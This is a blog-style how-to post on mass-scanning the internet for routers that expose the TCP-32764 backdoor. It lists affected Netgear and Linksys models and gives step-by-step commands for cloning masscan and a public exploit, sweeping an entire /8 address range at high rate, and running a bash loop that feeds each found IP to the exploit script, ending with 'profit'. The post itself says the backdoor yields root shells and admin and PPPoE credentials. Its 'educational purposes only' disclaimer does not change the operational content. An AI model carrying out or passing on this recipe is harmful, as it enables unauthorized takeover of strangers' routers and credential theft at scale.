[HOWTO] Searching the internet for the TCP-32764 netgear exploit

This is a backdoor from last month. You can find it in GitHub.
Here, i’ll describe a quick and dirty way to search the internet for this exploit.

This exploit allows complete control of the affected host. You can download/upload files, get a root shell, PPPoE credentials, admin password, etc.

The idea was originally posted here, however, the post didn’t described how to do it. So, i’ll post a very quick post on how to do it.

DISCLAIMER: educational purposes only. Use at your own risk. I only wrote the minimalist bash script and the how to.

Some more info from the author of the exploit.

Probable source of the backdoor:

Backdoor LISTENING ON THE INTERNET confirmed in :

  • Linksys WAG120N (@p_w999)
  • Netgear DG834B V5.01.14 (@domainzero)
  • Netgear DGN2000 1.1.1, 1.1.11.0, 1.3.10.0, 1.3.11.0, 1.3.12.0 (issue 44)
  • Netgear WPNT834 (issue 79)
  • OpenWAG200 maybe a little bit TOO open ;) (issue 49)

Backdoor confirmed in:

Backdoor may be present in:

  1. Get masscan from git hub.
    1. cd ~
    2. git clone https://github.com/robertdavidgraham/masscan.git
    3. cd masscan
    4. make
  2. Get the exploit
    1. cd ~
    2. git clone https://github.com/elvanderb/TCP-32764.git
  3. Search a subnet for the exploit, and export the stdout to a file, for instance, for file out.2 and subnet 11.0.0.0/8
    1. ./masscan -oL out.2 -p32764 11.0.0.0/8 –rate=10000000
    2. Run the desired subnets and output to different files. Then merge them with cat out.1 out.2 out.3 > out
    3. Strip the ip’s out with # cut -d’ ‘ -f4  out > ip_list
  4. Create the script to batch the output (see at the bottom),
  5. Put the poc.py and ip_list in the same directory as the script
  6. chmod +x run.sh
  7. run the script
  8. profit

#!/bin/bash
while read p; do
 ./poc.py --is_vuln --ip $p
sleep 3
done < ip_list

One thought on “[HOWTO] Searching the internet for the TCP-32764 netgear exploit”

Leave a Reply

Your email address will not be published. Required fields are marked *


9 × five =

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>